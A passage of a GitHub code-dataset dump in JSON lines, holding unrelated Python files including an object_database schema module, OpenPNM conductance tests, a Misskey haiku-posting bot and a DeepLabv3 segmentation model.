(mix_cls(discrete, linear, shaped)\n if (((discrete is not empty) + (linear is not empty)\n + (shaped is not empty)) >= 2)\n else (discrete\n if discrete is not empty\n else (linear\n if linear is not empty\n else shaped)))\n\n\ndef pack_points(points: Sequence[Point],\n empty: Empty,\n multipoint_cls: Type[Multipoint]) -> Maybe[Multipoint]:\n return multipoint_cls(points) if points else empty\n\n\ndef pack_segments(segments: Sequence[Segment],\n empty: Empty,\n multisegment_cls: Type[Multisegment]\n ) -> Union[Empty, Multisegment, Segment]:\n return ((multisegment_cls(segments)\n if len(segments) > 1\n else segments[0])\n if segments\n else empty)\n","repo_name":"lycantropos/ground","sub_path":"ground/core/packing.py","file_name":"packing.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"16806524343","text":"# 소수 카운팅 함수\ndef count_prime(N):\n count = 0\n # N과 2N 사이의 범위 \n for n in range(N+1, 2*N+1):\n if prime[n]:\n count += 1\n return count\n\n# 제한 범위 내의 소수를 미리 계산해둠\nn = 123456 * 2 + 1\nprime = [True] * n\n# 소수인지 판별할 숫자의 제곱근\n# 제곱근이 대략 약수 중간이기 때문 \nfor i in range(2, int(n**0.5)+1):\n # 과거의 계산으로 i가 소수가 아니라면 처리하지 않음\n # i가 소수가 아니라면 i의 배수도 전부 소수가 아닌 
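An equivalent counting-based sketch for the anagram kata above; collections.Counter trades the per-word sort for a linear histogram comparison:

from collections import Counter
from typing import List

def anagrams_counter(word: str, words: List[str]) -> List[str]:
    target = Counter(word)
    return [w for w in words if Counter(w) == target]

# anagrams_counter("abba", ["aabb", "abcd", "bbaa", "dada"]) -> ["aabb", "bbaa"]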
상태\n if prime[i]:\n # 에라토스테네스 체로 소수 아닌 숫자 거르기\n # i의 배수를 전부 소수가 아닌 것으로 처리\n for j in range(2*i, n, i):\n prime[j] = False\n\n# 테스트 데이터 입력\nNum = []\nwhile True:\n N = int(input())\n if N == 0:\n break\n Num.append(N)\n\n# 연산\nfor N in Num:\n print(count_prime(N))\n","repo_name":"joney0715/Algorithm_GroupStudy","sub_path":"joney0715/0803/common_BOJ_4948_베르트랑공준.py","file_name":"common_BOJ_4948_베르트랑공준.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9570620848","text":"n=int(input())\narr=list(map(int,input().strip().split()))\n#print(arr)\na,b=map(int,input().split())\n#print(a,b)\nf=0\nfor i in range(n):\n if arr[i]>=a and arr[i]<=b:\n print(arr[i],end=' ')\n f=1\nif f==0:\n print(\"-1\")\n","repo_name":"Sudheer0581/codemind-python","sub_path":"elements_in_between_A_and_B.py","file_name":"elements_in_between_A_and_B.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"15796184684","text":"import object_database._types as _types\n\nfrom object_database.object import Index, Indexed\nfrom types import FunctionType\nfrom typed_python import ConstDict, NamedTuple, Tuple, TupleOf, serialize\n\n\nObjectId = int\nFieldId = int\nObjectFieldId = NamedTuple(objId=int, fieldId=int, isIndexValue=bool)\nIndexValue = bytes\nIndexId = NamedTuple(fieldId=int, indexValue=IndexValue)\nDatabaseObjectBase = NamedTuple(_identity=int)\n\nTypeDefinition = NamedTuple(fields=TupleOf(str), indices=TupleOf(str))\nSchemaDefinition = ConstDict(str, TypeDefinition)\n\nFieldDefinition = NamedTuple(schema=str, typename=str, fieldname=str)\n\n\ndef SubscribeLazilyByDefault(t):\n t.__object_database_lazy_subscription__ = True\n return t\n\n\ndef indexValueFor(type, value, serializationContext=None):\n return serialize(type, value, serializationContext)\n\n\nclass Schema:\n \"\"\"A collection of types that can be used to access data in a database.\"\"\"\n\n def __init__(self, name):\n self._name = name\n\n # Map: typename:str -> cls\n self._types = {}\n\n # set of typename that still need definition\n self._undefinedTypes = set()\n\n # Map: typename:str -> type\n # contains types we have defined on the schema that are not\n # DatabaseObject types.\n self._supportingTypes = {}\n\n # class -> indexname -> tuple(str)\n self._indices = {}\n\n # class -> indexname -> tuple(str)\n self._index_types = {}\n\n # class -> fieldname -> type\n self._field_types = {}\n\n self._frozen = False\n\n # Map: cls -> original_cls\n self._types_to_original = {}\n\n def toDefinition(self):\n return SchemaDefinition(\n {\n tname: self.typeToDef(t)\n for tname, t in self._types.items()\n if getattr(t, \"__is_database_object_type__\", False)\n }\n )\n\n def __repr__(self):\n return \"Schema(%s)\" % self.name\n\n def lookupFullyQualifiedTypeByName(self, name):\n if not name.startswith(self.name + \".\"):\n return None\n return self._types.get(name[len(self.name) + 1 :])\n\n def typeToDef(self, t):\n return TypeDefinition(\n fields=sorted(self._field_types[t.__name__]),\n indices=sorted(self._indices[t.__name__]),\n )\n\n def getType(self, t):\n return self._types.get(t)\n\n def fieldType(self, typename, fieldname):\n \"\"\"Return the type of the field named 'fieldname' in 'typename'.\n\n If the field or type is unknown, return None.\n \"\"\"\n return self._field_types.get(typename, {}).get(fieldname, None)\n\n def indexType(self, typename, 
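Each call to count_prime above rescans N numbers; a prefix-sum sketch over the same sieve (assumes the prime list and n built above) makes every query O(1):

counts = [0] * n                   # counts[i] = number of primes p with 2 <= p <= i
running = 0
for i in range(2, n):
    running += prime[i]
    counts[i] = running

def count_between(N):              # primes p with N < p <= 2N
    return counts[2 * N] - counts[N]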
fieldname):\n \"\"\"Return the type of the field named 'fieldname' in 'typename'.\n\n If the field or type is unknown, return None.\n \"\"\"\n return self._index_types.get(typename, {}).get(fieldname, None)\n\n @property\n def name(self):\n return self._name\n\n def freeze(self):\n if not self._frozen:\n assert not self._undefinedTypes, \"Still need definitions for %s\" % (\n \", \".join(self._undefinedTypes)\n )\n self._frozen = True\n\n def __setattr__(self, typename, val):\n if typename.startswith(\"_\"):\n self.__dict__[typename] = val\n return\n\n assert not self._frozen, \"Schema is already frozen.\"\n\n assert isinstance(val, type)\n\n self._supportingTypes[typename] = val\n\n def __getattr__(self, typename):\n assert \".\" not in typename\n\n if typename.startswith(\"_\"):\n return self.__dict__[typename]\n\n if typename in self._supportingTypes:\n return self._supportingTypes[typename]\n\n if typename not in self._types:\n if self._frozen:\n raise AttributeError(typename)\n\n cls = _types.createDatabaseObjectType(self, typename)\n\n self._types[typename] = cls\n self._indices[typename] = {}\n self._index_types[typename] = {}\n self._field_types[typename] = {}\n\n self._undefinedTypes.add(typename)\n\n return self._types[typename]\n\n def define(self, cls):\n typename = cls.__name__\n\n assert not typename.startswith(\n \"_\"\n ), \"Illegal to use _ for first character in database classnames.\"\n assert not self._frozen, \"Schema is already frozen\"\n\n # get a type stub\n t = getattr(self, typename)\n\n # add the canonical ' exists' property, which we use under the hood to indicate\n # existence/deletion of an object.\n self._field_types[typename][\" exists\"] = bool\n self._indices[typename][\" exists\"] = (\" exists\",)\n self._index_types[typename][\" exists\"] = bool\n\n t.setModule(cls.__module__)\n t.addField(\" exists\", bool)\n t.addIndex(\" exists\", (\" exists\",))\n\n # make sure it's not defined yet\n assert typename in self._undefinedTypes, f\"Type {typename} is not undefined.\"\n self._undefinedTypes.discard(typename)\n\n self._types_to_original[t] = cls\n\n # compute baseClasses in order to collect the type's attributes but filter out\n # object and the DatabaseObjectBase\n baseClasses = [x for x in cls.__mro__ if x not in (object, DatabaseObjectBase)]\n\n properBaseClasses = [self._types_to_original.get(b, b) for b in baseClasses]\n\n # Collect the type's attributes and populate the actual type object\n # Map: name -> type\n classMembers = {}\n\n for base in reversed(properBaseClasses):\n for name, val in base.__dict__.items():\n classMembers[name] = val\n\n for name, val in classMembers.items():\n isMagic = name[:2] == \"__\"\n\n if isinstance(val, type) and not isMagic:\n t.addField(name, val)\n self._field_types[typename][name] = val\n elif isinstance(val, Indexed):\n t.addField(name, val.obj)\n t.addIndex(name, (name,))\n self._field_types[typename][name] = val.obj\n self._indices[typename][name] = (name,)\n self._index_types[typename][name] = val.obj\n elif isinstance(val, Index):\n # do this in a second pass\n pass\n elif isinstance(val, property):\n t.addProperty(name, val.fget, val.fset)\n elif isinstance(val, staticmethod):\n t.addStaticMethod(name, val.__func__)\n elif isinstance(val, classmethod):\n\n def bind(func, t):\n def inner(*args, **kwargs):\n return func(t, *args, **kwargs)\n\n inner.__name__ = func.__name__\n inner.__qualname__ = func.__qualname__\n inner.__doc__ = func.__doc__\n\n return inner\n\n t.addStaticMethod(name, bind(val.__func__, 
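The member-collection step being built above, as a standalone sketch: walking the MRO in reverse lets attributes from more-derived classes override base-class ones (hypothetical collect_members; the stop classes are an assumption):

def collect_members(cls, stop=(object,)):
    members = {}
    for base in reversed([c for c in cls.__mro__ if c not in stop]):
        members.update(vars(base))     # later (more derived) bases win
    return members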
t))\n elif isinstance(val, FunctionType):\n t.addMethod(name, val)\n\n for name, val in classMembers.items():\n if isinstance(val, Index):\n t.addIndex(name, tuple(val.names))\n assert len(val.names)\n\n self._indices[typename][name] = tuple(val.names)\n\n if len(val.names) > 1:\n self._index_types[typename][name] = Tuple(\n *[self._field_types[typename][fieldname] for fieldname in val.names]\n )\n else:\n self._index_types[typename][name] = self._field_types[typename][\n val.names[0]\n ]\n\n t.finalize()\n\n if hasattr(cls, \"__object_database_lazy_subscription__\"):\n t.markLazyByDefault()\n\n return t\n","repo_name":"APrioriInvestments/object_database","sub_path":"object_database/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":7837,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"41190968223","text":"import FWCore.ParameterSet.Config as cms\n\nPrescaleService = cms.Service('PrescaleService',\n lvl1Labels = cms.vstring('default'),\n prescaleTable = cms.VPSet(\n cms.PSet(\n pathName = cms.string('HLTPath'),\n prescales = cms.vuint32(1)\n )\n ),\n lvl1DefaultLabel = cms.string('default'),\n forceDefault = cms.bool(False)\n)\n","repo_name":"cms-sw/cmssw-cfipython","sub_path":"FWCore/PrescaleService/PrescaleService_cfi.py","file_name":"PrescaleService_cfi.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"5795676472","text":"import torch\nimport torch.nn as nn\n\nclass Seq2Seq(nn.Module):\n\tdef __init__(\n\t\tself,\n\t\tinput_dim: int,\n\t\thidden_dim: int,\n\t\toutput_dim: int,\n\t\tnum_layers: int) -> None:\n\t\tsuper(Seq2Seq, self).__init__()\n\n\t\tself.rnn = nn.GRU(input_dim, hidden_dim, num_layers, batch_first=True)\n\t\tself.dnn = nn.Sequential(\n\t\t\tnn.Linear(hidden_dim, output_dim)\n\t\t)\n\n\tdef forward(self, seq: torch.Tensor) -> torch.Tensor:\n\t\t# seq: [bs, seq_len, input_dim]\n\t\toutput, hn = self.rnn(seq)\n\t\toutput = self.dnn(output)\n\t\treturn output\n\n\nclass Seq2Val(nn.Module):\n\tdef __init__(\n\t\tself,\n\t\tinput_dim: int,\n\t\thidden_dim: int,\n\t\toutput_dim: int,\n\t\tnum_layers: int) -> None:\n\t\tsuper(Seq2Val, self).__init__()\n\n\t\tself.rnn = nn.GRU(input_dim, hidden_dim, num_layers, batch_first=True)\n\t\tself.dnn = nn.Sequential(\n\t\t\tnn.Linear(hidden_dim, output_dim),\n\t\t)\n\n\tdef forward(self, seq: torch.Tensor) -> torch.Tensor:\n\t\t# seq: [bs, seq_len, input_dim]\n\t\toutput, hn = self.rnn(seq)\n\t\toutput = output[:, -1, :]\n\t\toutput = self.dnn(output)\n\t\treturn output \n\t\t\n\nclass Val2Val(nn.Module):\n\tdef __init__(\n\t\tself, \n\t\tinput_dim: int,\n\t\thidden_dim: int, \n\t\toutput_dim: int, \n\t\tnum_layers: int) -> None:\n\t\tsuper().__init__()\n\n\t\tmodel = []\n\t\tfor n in range(num_layers):\n\t\t\tcur_in_dim = input_dim if n==0 else hidden_dim\n\t\t\tcur_out_dim = output_dim if n==num_layers-1 else hidden_dim\n\t\t\tmodel.append(nn.Linear(cur_in_dim, cur_out_dim))\n\t\t\tif n!=num_layers-1:\n\t\t\t\tmodel.append(nn.ReLU())\n\t\t\telse:\n\t\t\t\tmodel.append(nn.Sigmoid())\n\t\tself.model = nn.Sequential(*model)\n\n\tdef forward(self, val: torch.Tensor) -> torch.Tensor:\n\t\t# val: [bs, seq_len, input_dim]\n\t\toutput = self.model(val)\n\t\treturn 
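A quick shape check for the Seq2Seq module defined above (torch assumed installed; dimensions arbitrary): with batch_first=True the GRU keeps [batch, seq_len, ...] and the Linear head maps every time step.

import torch

model = Seq2Seq(input_dim=8, hidden_dim=16, output_dim=4, num_layers=2)
x = torch.randn(3, 10, 8)              # [batch, seq_len, input_dim]
assert model(x).shape == (3, 10, 4)    # one output vector per time step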
output\n","repo_name":"hkberlin/nasa-hackathon-whats-new","sub_path":"model3/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4070598426","text":"# -*- coding: utf-8 -*-\n'''\nCreated on 19-05-2012\n\n@author: winx\n'''\nfrom numpy import *\nfrom numpy.random import *\nfrom numpy.ma.core import floor, log\nfrom HistogramPlot.PlotHist import PlotHist\n\n \nclass Geometric(object):\n '''\n Generator geometryczny\n '''\n\n def __init__(self,p):\n self.p = p\n self.name = 'Rozkład geometryczny'\n \n def getP(self):\n return self.p\n \n def getName(self):\n return self.name \n \n \n def showIntGenAndCount(self,list):\n '''\n wypisuje liste wylosowanych liczb\n '''\n R = []\n index = 0\n for i in list:\n if i != 0:\n for l in range(i):\n R.append(index)\n index=index+1\n return R\n \n def probabilityChart(self, X):\n '''\n y dla wykresu prawdopodobienstwa\n '''\n g = []\n for l in X:\n P = self.p*(pow(1-self.p,l))\n g.append(P)\n return g\n \n def generateInt(self, k):\n '''\n generowanie k liczb\n '''\n T = [0]*k\n for i in range(k):\n U = uniform(low=0, high=1)\n X = log(U)/log(1-self.p)\n T[(int(floor(X)))] = T[(int(floor(X)))] + 1\n return T\n \n \n#A = Geometric(0.1)\n#C = A.showIntGenAndCount(A.generateInt(100)) \n#P = A.probabilityChart(C) \n#A = PlotHist()\n#A.plotHistgram(\"Generator dwumianowy\", C,P,1,'ilosc','liczby')\n#A.showHistogram()","repo_name":"winx88/ProjectsPythonDjango","sub_path":"MMProjectOnePY/Generators/Geometric.py","file_name":"Geometric.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"434888579","text":"#Write a Python program to calculate the area of a parallelogram\r\n\r\ndef parallelogram(b,h):\r\n if b or h>0:\r\n area=round(b*h)\r\n print(area)\r\n\r\n\r\n\r\nprint(parallelogram(10,5))","repo_name":"ShyamP1112/Shyam_06sept_python","sub_path":"Module 3/question3.60.py","file_name":"question3.60.py","file_ext":"py","file_size_in_byte":189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41638342188","text":"import openpnm as op\nimport numpy as _np\nfrom numpy.testing import assert_allclose\n\n\nclass HydraulicConductanceTest:\n def setup_class(self):\n self.net = op.network.Cubic(shape=[5, 5, 5], spacing=1.0)\n self.geo = op.geometry.GenericGeometry(network=self.net,\n pores=self.net.Ps,\n throats=self.net.Ts)\n self.geo['pore.diameter'] = 1.0\n self.geo['throat.diameter'] = 0.5\n self.geo['pore.area'] = 1.0\n self.geo['throat.area'] = 0.5\n self.phase = op.phases.GenericPhase(network=self.net)\n self.phase['pore.viscosity'] = 1e-5\n self.phys = op.physics.GenericPhysics(network=self.net,\n phase=self.phase,\n geometry=self.geo)\n\n def teardown_class(self):\n mgr = op.Workspace()\n mgr.clear()\n\n def test_hagen_poiseuille(self):\n self.geo['throat.conduit_lengths.pore1'] = 0.25\n self.geo['throat.conduit_lengths.throat'] = 0.6\n self.geo['throat.conduit_lengths.pore2'] = 0.15\n mod = op.models.physics.hydraulic_conductance.hagen_poiseuille\n self.phys.add_model(propname='throat.hydraulic_conductance', model=mod)\n actual = self.phys['throat.hydraulic_conductance'].mean()\n assert_allclose(actual, desired=1421.0262776)\n\n def test_generic_hydraulic(self):\n # Pass size factors as dict\n self.geo['throat.hydraulic_size_factors'] = {\n \"pore1\": 0.123, 
\"throat\": 0.981, \"pore2\": 0.551\n }\n mod = op.models.physics.hydraulic_conductance.generic_hydraulic\n self.phys.add_model(propname='throat.g_hydraulic_conductance', model=mod)\n self.phys.regenerate_models()\n actual = self.phys['throat.g_hydraulic_conductance'].mean()\n assert_allclose(actual, desired=9120.483231751232)\n # Pass size factors as an array\n for elem in [\"pore1\", \"throat\", \"pore2\"]:\n del self.geo[f\"throat.hydraulic_size_factors.{elem}\"]\n self.geo['throat.hydraulic_size_factors'] = 0.896\n self.phys.regenerate_models(\"throat.g_hydraulic_conductance\")\n actual = self.phys['throat.g_hydraulic_conductance'].mean()\n assert_allclose(actual, desired=89600.0)\n\n def test_hagen_poiseuille_2d(self):\n self.geo['throat.conduit_lengths.pore1'] = 0.25\n self.geo['throat.conduit_lengths.throat'] = 0.6\n self.geo['throat.conduit_lengths.pore2'] = 0.15\n mod = op.models.physics.hydraulic_conductance.hagen_poiseuille_2d\n self.phys.add_model(propname='throat.hydraulic_conductance', model=mod)\n actual = self.phys['throat.hydraulic_conductance'].mean()\n assert_allclose(actual, desired=1602.564)\n\n def test_hagen_poiseuille_zero_length_throat(self):\n self.geo['throat.conduit_lengths.pore1'] = 0.25\n self.geo['throat.conduit_lengths.throat'] = 0.0\n self.geo['throat.conduit_lengths.pore2'] = 0.15\n mod = op.models.physics.hydraulic_conductance.hagen_poiseuille\n self.phys.add_model(propname='throat.hydraulic_conductance',\n model=mod)\n actual = self.phys['throat.hydraulic_conductance'].mean()\n assert_allclose(actual, desired=9947.1839)\n\n def test_classic_hagen_poiseuille(self):\n self.geo['pore.diameter'] = 1.0\n self.geo['throat.diameter'] = 1.0\n self.geo['throat.length'] = 1.0e-9\n self.air = op.phases.Air(network=self.net)\n self.phys = op.physics.GenericPhysics(network=self.net,\n phase=self.air,\n geometry=self.geo)\n mod = op.models.physics.hydraulic_conductance.classic_hagen_poiseuille\n self.phys.add_model(propname='throat.conductance',\n model=mod)\n assert _np.allclose(a=self.phys['throat.conductance'][0],\n b=1330.68207684)\n\n def test_valvatne_blunt(self):\n self.phase = op.phases.GenericPhase(network=self.net)\n self.phase['pore.viscosity'] = 1e-5\n self.phys = op.physics.GenericPhysics(network=self.net,\n phase=self.phase,\n geometry=self.geo)\n mod = op.models.physics.hydraulic_conductance.valvatne_blunt\n sf = _np.sqrt(3) / 36.0\n self.geo['pore.shape_factor'] = _np.ones(self.geo.Np) * sf\n self.geo['throat.shape_factor'] = _np.ones(self.geo.Nt) * sf\n self.phys.add_model(propname='throat.valvatne_conductance', model=mod)\n actual = self.phys['throat.valvatne_conductance'].mean()\n desired = 1030.9826 # This is the old value\n desired = 7216.8783 # This is what it gets now\n assert_allclose(actual, desired=desired)\n\n\nif __name__ == '__main__':\n\n t = HydraulicConductanceTest()\n self = t\n t.setup_class()\n for item in t.__dir__():\n if item.startswith('test'):\n print(f'Running test: {item}')\n t.__getattribute__(item)()\n","repo_name":"halotudio/openPNM-copy2","sub_path":"tests/unit/models/physics/HydraulicConductanceTest.py","file_name":"HydraulicConductanceTest.py","file_ext":"py","file_size_in_byte":5160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74822303875","text":"# coding: utf-8\r\n\r\nfrom misskey import Misskey\r\n\r\nimport random\r\nimport os\r\nimport time\r\n\r\n#使える文字のリスト\r\nhiragana = ['ぁ', 'あ', 'ぃ', 'い', 'ぅ', 'う', 'ぇ', 'え', 'ぉ', 'お', 'か', 'が', 'き', 'ぎ', 'く', 
'ぐ', 'け', 'げ', 'こ', 'ご', 'さ', 'ざ', 'し', 'じ', 'す', 'ず', 'せ', 'ぜ', 'そ', 'ぞ', 'た', 'だ', 'ち', 'ぢ', 'っ', 'つ', 'づ', 'て', 'で', 'と', 'ど', 'な', 'に', 'ぬ', 'ね', 'の', 'は', 'ば', 'ぱ', 'ひ', 'び', 'ぴ', 'ふ', 'ぶ', 'ぷ', 'へ', 'べ', 'ぺ', 'ほ', 'ぼ', 'ぽ', 'ま', 'み', 'む', 'め', 'も', 'ゃ', 'や', 'ゅ', 'ゆ', 'ょ', 'よ', 'ら', 'り', 'る', 'れ', 'ろ', 'ゎ', 'わ', 'ゐ', 'ゑ', 'を', 'ん','ー']\r\n\r\n#初句.二句.結句をそれぞれ作成\r\nsyoku = ''.join(random.choices(hiragana,k=5))\r\nniku = ''.join(random.choices(hiragana,k=7))\r\nkekku = ''.join(random.choices(hiragana,k=5))\r\n\r\n#できた川柳\r\nwhile True:\r\n try:\r\n misskey_address = os.environ.get(\"MISSKEY_SERVER_ADDRESS\")\r\n misskey_token = os.environ.get(\"MISSKEY_TOKEN\")\r\n senryu = Misskey(misskey_address)\r\n senryu.token = misskey_token\r\n senryu.notes_create(text=syoku+\"\\n\"+niku+\"\\n\"+kekku)\r\n except:\r\n time.sleep(300)\r\n else:\r\n break\r\nprint(syoku+\"\\n\"+niku+\"\\n\"+kekku)\r\n","repo_name":"BlossomsArchive/575","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72443678914","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torchvision.models import resnet50\n\n# https://blog.csdn.net/qq_36530992/article/details/102628455?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522166029678316782388042242%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=166029678316782388042242&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~top_positive~default-1-102628455-null-null.142^v40^pc_rank_34_queryrelevant0,185^v2^control&utm_term=aspp&spm=1018.2226.3001.4187\n\n\n# 借鉴 torchvision 库手写的 ResNet50, 备用(文件中要求从零实现)\n# ResNet 中不使用 bias, 是由于 bn 层的存在, bias 不起作用\nclass ResNet_Head(nn.Module):\n def __init__(self,v1c=True):\n super().__init__()\n\n if v1c:\n self.conv = nn.Sequential(\n nn.Conv2d(3,64,kernel_size=3,stride=2,padding=1,bias=False),\n nn.Conv2d(64,64,kernel_size=3,stride=1,padding=1,bias=False),\n nn.Conv2d(64,64,kernel_size=3,stride=1,padding=1,bias=False)\n )\n\n else:\n self.conv = nn.Conv2d(3,64,kernel_size=7,stride=2,padding=3,bias=False)\n\n self.bn_conv = nn.BatchNorm2d(64)\n self.relu = nn.ReLU(inplace=True)\n # ceil_mode 会在pooling时, 将最后小于卷积核大小的边界保留下来另外计算, 等同于自适应padding\n self.maxpool = nn.MaxPool2d(kernel_size=3,stride=2,padding=0,ceil_mode=True)\n\n\n def forward(self,x):\n output = self.conv(x)\n output = self.bn_conv(output)\n output = self.relu(output)\n output = self.maxpool(output)\n \n return output\n\nclass ResNet_bottleneck(nn.Module):\n def __init__(self,input_c,middle_c,output_c,stride=1,dilation=1):\n super().__init__()\n\n # 若需下采样 或 输入输出通道数不等,则残差链路需要1*1卷积控制通道数\n self.branch_conv = (stride != 1) or (input_c != output_c)\n\n if stride != 1:\n self.point_conv1 = nn.Conv2d(input_c,middle_c,kernel_size=1,stride=stride,bias=False)\n else:\n self.point_conv1 = nn.Conv2d(input_c,middle_c,kernel_size=1,bias=False)\n\n self.bn1 = nn.BatchNorm2d(middle_c)\n self.conv = nn.Conv2d(middle_c,middle_c,kernel_size=3,stride=1,padding=dilation,bias=False,dilation=dilation)\n self.bn2 = nn.BatchNorm2d(middle_c)\n self.point_conv2 = nn.Conv2d(middle_c,output_c,kernel_size=1,bias=False)\n self.bn3 = nn.BatchNorm2d(output_c)\n self.act = nn.ReLU(inplace=True)\n\n if self.branch_conv:\n if stride != 1:\n self.point_conv_ = nn.Conv2d(input_c,output_c,kernel_size=1,stride=stride,bias=False)\n else:\n self.point_conv_ = 
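The posting loop in the record above retries forever, 300 s at a time, and swallows every exception. A bounded variant sketch (hypothetical post_with_retry) with the same back-off:

import time

def post_with_retry(post_fn, attempts=5, backoff_s=300):
    for i in range(attempts):
        try:
            return post_fn()
        except Exception:
            if i == attempts - 1:
                raise                  # give up after the last attempt
            time.sleep(backoff_s)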
nn.Conv2d(input_c,output_c,kernel_size=1,bias=False)\n self.bn_ = nn.BatchNorm2d(output_c)\n\n\n def forward(self,x):\n y = self.point_conv1(x)\n y = self.bn1(y)\n y = self.act(y)\n y = self.conv(y)\n y = self.bn2(y)\n y = self.act(y)\n y = self.point_conv2(y)\n y = self.bn3(y)\n\n if self.branch_conv:\n y_ = self.point_conv_(x)\n y_ = self.bn_(y_)\n y = y + y_\n\n else:\n y = y + x\n\n y = self.act(y)\n return y\n\nclass ResNet_block(nn.Module):\n def __init__(self,input_c,output_c,duplicate,stride=1,dilation=1):\n super().__init__()\n\n self.list = nn.ModuleList()\n self.list.append(ResNet_bottleneck(input_c,output_c//4,output_c,stride,dilation))\n\n for i in range(duplicate - 1):\n self.list.append(ResNet_bottleneck(output_c,output_c//4,output_c,1,dilation))\n\n def forward(self,x):\n for module in self.list:\n x = module(x)\n return x\n\nclass ResNet50(nn.Module):\n def __init__(self):\n super().__init__()\n\n self.conv1 = ResNet_Head(True)\n self.conv2 = ResNet_block(64,256,3,2)\n self.conv3 = ResNet_block(256,512,4,2)\n self.conv4 = ResNet_block(512,1024,6,2)\n self.conv5 = ResNet_block(1024,2048,3,1)\n self.avgpool = nn.AdaptiveAvgPool2d((1,1))\n\n self.flatten = nn.Flatten()\n self.fc = nn.Linear(2048,1000)\n\n def forward(self,x):\n print(0,x.shape)\n y = self.conv1(x)\n print(1,y.shape)\n y = self.conv2(y)\n print(2,y.shape)\n y = self.conv3(y)\n print(3,y.shape)\n y = self.conv4(y)\n print(4,y.shape)\n y = self.conv5(y)\n print(5,y.shape)\n y = self.avgpool(y)\n y = self.flatten(y)\n y = self.fc(y)\n return y\n\n\n# backbone = ResNet50()\n# conv1:4\n# conv2:8\n# conv3:16\n# conv4:32\n# conv5:32\n\n\nclass ResNet50_FCN(nn.Module):\n def __init__(self):\n super().__init__()\n\n self.conv1 = ResNet_Head(True)\n self.conv2 = ResNet_block(64,256,3,2)\n self.conv3 = ResNet_block(256,512,4,1)\n self.conv4 = ResNet_block(512,1024,6,1,2)\n self.conv5 = ResNet_block(1024,2048,3,1,4)\n\n def forward(self,x):\n # print(0,x.shape)\n y = self.conv1(x)\n # print(1,y.shape)\n y = self.conv2(y)\n # print(2,y.shape)\n y = self.conv3(y)\n # print(3,y.shape)\n y = self.conv4(y)\n # print(4,y.shape)\n y = self.conv5(y)\n # print(5,y.shape)\n\n return y\n\n\nclass ASPP(nn.Module):\n def __init__(self,input_c=2048,middle_c=512,num_classes=10,scale=60,primal=480,dropout=0.3):\n super(ASPP,self).__init__()\n\n self.image_pool = nn.Sequential(\n nn.AdaptiveAvgPool2d((1, 1)),\n nn.Conv2d(input_c,middle_c,kernel_size=1,bias=False),\n nn.Dropout2d(p=dropout),\n nn.BatchNorm2d(middle_c),\n nn.ReLU(inplace=True),\n nn.Upsample((scale,scale),mode='bilinear')\n )\n\n self.conv1 = nn.Sequential(\n nn.Conv2d(input_c,middle_c,kernel_size=1,bias=False),\n nn.Dropout2d(p=dropout),\n nn.BatchNorm2d(middle_c),\n nn.ReLU(inplace=True)\n )\n \n self.dilated_conv2 = nn.Sequential(\n nn.Conv2d(input_c,middle_c,kernel_size=3,padding=6,dilation=6,bias=False),\n nn.Dropout2d(p=dropout),\n nn.BatchNorm2d(middle_c),\n nn.ReLU(inplace=True)\n )\n\n self.dilated_conv3 = nn.Sequential(\n nn.Conv2d(input_c,middle_c,kernel_size=3,padding=12,dilation=12,bias=False),\n nn.Dropout2d(p=dropout),\n nn.BatchNorm2d(middle_c),\n nn.ReLU(inplace=True)\n )\n\n self.dilated_conv4 = nn.Sequential(\n nn.Conv2d(input_c,middle_c,kernel_size=3,padding=18,dilation=18,bias=False),\n nn.Dropout2d(p=dropout),\n nn.BatchNorm2d(middle_c),\n nn.ReLU(inplace=True)\n )\n\n self.output = nn.Sequential(\n nn.Conv2d(5*middle_c,middle_c,kernel_size=3,padding=1,bias=False),\n nn.BatchNorm2d(middle_c),\n nn.ReLU(inplace=True),\n nn.Dropout2d(p=dropout),\n 
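# the five ASPP branches are concatenated to 5*middle_c channels and fused by the\n            # 3x3 conv above; the 1x1 conv below projects to num_classes and the final\n            # Upsample restores the primal input resolution\n            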
nn.Conv2d(middle_c,num_classes,kernel_size=1,bias=False),\n nn.Upsample((primal,primal),mode='bilinear')\n )\n\n def forward(self, x):\n\n y1 = self.conv1(x)\n y2 = self.dilated_conv2(x)\n y3 = self.dilated_conv3(x)\n y4 = self.dilated_conv4(x)\n y5 = self.image_pool(x)\n\n y = torch.cat([y1,y2,y3,y4,y5],dim=1)\n\n y = self.output(y)\n # print(y.shape)\n\n return y\n\n\nclass DeepLabv3(nn.Module):\n def __init__(self):\n super().__init__()\n \n self.backbone = ResNet50_FCN()\n self.ASPP = ASPP(num_classes=1,scale=28,primal=224)\n \n def forward(self,x):\n y = self.backbone(x)\n y = self.ASPP(y)\n\n return y\n\nif __name__ == '__main__':\n model = DeepLabv3()\n model(torch.ones((2,3,480,480)))\n\n","repo_name":"xmttttt/DeepLabV3","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":7928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} 